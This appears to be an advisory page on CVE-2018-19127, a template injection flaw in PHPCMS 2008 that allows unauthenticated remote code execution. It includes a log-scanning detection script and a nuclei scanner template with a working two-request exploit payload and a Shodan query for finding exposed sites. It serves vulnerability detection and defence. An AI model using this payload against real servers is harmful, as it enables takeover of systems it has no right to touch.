PHPCMS 2008 Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: PHPCMS 2008 Remote Code Execution Vulnerability

Vulnerability identifiers:

  • CVE: CVE-2018-19127

Vulnerability type: Server-Side Template Injection

Severity: Critical

Description: PHPCMS 2008 is an old PHP content management system that was widely used to build websites and manage content. Because of its long history, many sites may still be running it, particularly in China. It was popular for its ease of use and flexibility, but since maintenance stopped it contains multiple security vulnerabilities.

This vulnerability is a server-side template injection: through the template injection flaw in type.php, an attacker can write malicious content into a PHP template cache file and thereby execute arbitrary code. The root cause is that the system does not strictly validate and filter user input, which allows an attacker to inject malicious code.

An attacker who successfully exploits this vulnerability can execute arbitrary code on the server and take full control of the affected system. Because exploitation requires no authentication, the risk is extremely high. An attacker could use it for data theft, service disruption, or further penetration of the network. Since PHPCMS 2008 is no longer maintained, users are advised to stop using it immediately or to restrict public access to it in order to prevent potential security threats.
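As an added defender-side example (not part of this advisory or of the nuclei project), the following Python flags both stages of the pattern described above in web server access logs: a `template` parameter to type.php that is not a plain template name, followed by a direct fetch of a file under data/cache_template/. It assumes Apache combined log format and that legitimate PHPCMS 2008 template names are plain identifiers; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:01:01 +0000] "GET /type.php?template=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:10:01:05 +0000] "GET /type.php?template=tag_()%7B%7D%3Becho(md5(123))%3B%7B//../rss HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:10:01:06 +0000] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 200 32 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: legitimate PHPCMS 2008 template names are plain identifiers. Anything
# else in type.php's `template` parameter (braces, semicolons, "../") is treated as
# an injection attempt, since the vulnerable code writes it into a cached .tpl.php file.
SAFE_TEMPLATE = re.compile(r'^[A-Za-z0-9_]+$')
CACHE_PATH = re.compile(r'^/data/cache_template/[^/]+\.tpl\.php$')


def analyze(log_text):
    """Return (source, reason, url) findings for both stages of CVE-2018-19127."""
    findings = []
    injected_sources = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, url, status = m['src'], m['url'], m['status']
        parts = urlsplit(url)
        if parts.path.endswith('/type.php'):
            # parse_qs percent-decodes the value, so encoded braces/semicolons are seen.
            for tpl in parse_qs(parts.query).get('template', []):
                if not SAFE_TEMPLATE.match(tpl):
                    findings.append((src, 'template injection attempt in type.php', url))
                    injected_sources.add(src)
        elif CACHE_PATH.match(parts.path) and status == '200':
            # Stage two: the poisoned cache file is requested directly, which executes it.
            if src in injected_sources:
                reason = 'cache template fetched after injection'
            else:
                reason = 'direct fetch of cache template'
            findings.append((src, reason, url))
    return findings


if __name__ == '__main__':
    for src, reason, url in analyze(SAMPLE_LOG):
        print(f'{src}: {reason} ({url})')
```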

Vendor: PHPCMS

Product: PHPCMS 2008

Search query: http.html:"Powered by phpcms"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/42570c21945fc41ae45a467c47c2a7cc716b3011/http%2Fcves%2F2018%2FCVE-2018-19127.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2018-19127

info:
  name: PHPCMS 2008 - Remote Code Execution via Template Injection
  author: tomaquet18
  severity: critical
  description: |
    PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
  impact: |
    Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
  remediation: |
    The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
  reference:
    - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
    - https://github.com/advisories/GHSA-p498-q357-m3p7
  tags: cve,phpcms,rce,template-injection,unauth

  metadata:
    max-request: 2
    shodan-query: http.html:"Powered by phpcms"
    verified: false

variables:
  payload: "tag_(){};echo(md5(123));{//../rss"

http:
  - method: GET
    path:
      - "{{BaseURL}}/type.php?template={{payload}}"

    unsafe: true
    max-redirects: 0
    stop-at-first-match: true

    matchers:
      - type: status
        internal: true
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/data/cache_template/rss.tpl.php"

    unsafe: true
    max-redirects: 0
    stop-at-first-match: true

    matchers:
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"